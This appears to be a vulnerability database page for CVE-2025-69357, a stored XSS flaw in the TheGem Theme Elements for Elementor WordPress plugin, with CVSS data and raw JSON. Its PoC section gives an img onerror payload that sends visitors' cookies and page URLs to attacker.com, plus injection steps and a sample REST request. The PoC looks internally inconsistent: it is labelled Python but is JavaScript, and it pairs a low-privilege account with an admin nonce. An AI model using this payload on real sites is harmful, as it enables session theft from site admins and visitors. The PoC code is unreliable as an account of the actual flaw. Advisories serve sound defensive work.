Security Vulnerability Report
中文
CVE-2025-69357 CVSS 6.5 MEDIUM

CVE-2025-69357

Published: 2026-01-06 17:15:48
Last Modified: 2026-04-15 00:35:42

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CodexThemes TheGem Theme Elements (for Elementor) thegem-elements-elementor allows Stored XSS.This issue affects TheGem Theme Elements (for Elementor): from n/a through <= 5.11.0.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

TheGem Theme Elements (for Elementor) <= 5.11.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-69357 Stored XSS PoC for TheGem Elements Elementor Plugin // Target: WordPress with TheGem Theme Elements plugin <= 5.11.0 // PoC Payload - Stored XSS const xssPayload = '<img src=x onerror="fetch(`https://attacker.com/steal?c=${document.cookie}&u=${window.location.href}`,{method:\'GET\',credentials:\'include\'})\" />'; // Steps to exploit: // 1. Login to WordPress with low-privilege account (subscriber/contributor) // 2. Navigate to a page edited with Elementor // 3. Add a TheGem Elements widget (e.g., Counter, Icon Box, or similar) // 4. Inject the XSS payload in text fields like title, content, or custom HTML // 5. Save and publish the page // 6. When admin or other users view the page, the XSS will execute // Example HTTP Request: const pocRequest = { method: 'POST', path: '/wp-json/wp/v2/posts/123', headers: { 'Content-Type': 'application/json', 'X-WP-Nonce': '[admin_nonce]' }, body: { 'content': '[elementor-template id="456"][thegem-counter title="' + xssPayload + '" value="1"]' } }; console.log('CVE-2025-69357 PoC - Stored XSS in TheGem Elements'); console.log('Payload:', xssPayload); console.log('Target: TheGem Theme Elements for Elementor <= 5.11.0');

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69357", "sourceIdentifier": "[email protected]", "published": "2026-01-06T17:15:48.327", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CodexThemes TheGem Theme Elements (for Elementor) thegem-elements-elementor allows Stored XSS.This issue affects TheGem Theme Elements (for Elementor): from n/a through <= 5.11.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/thegem-elements-elementor/vulnerability/wordpress-thegem-theme-elements-for-elementor-plugin-5-11-0-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}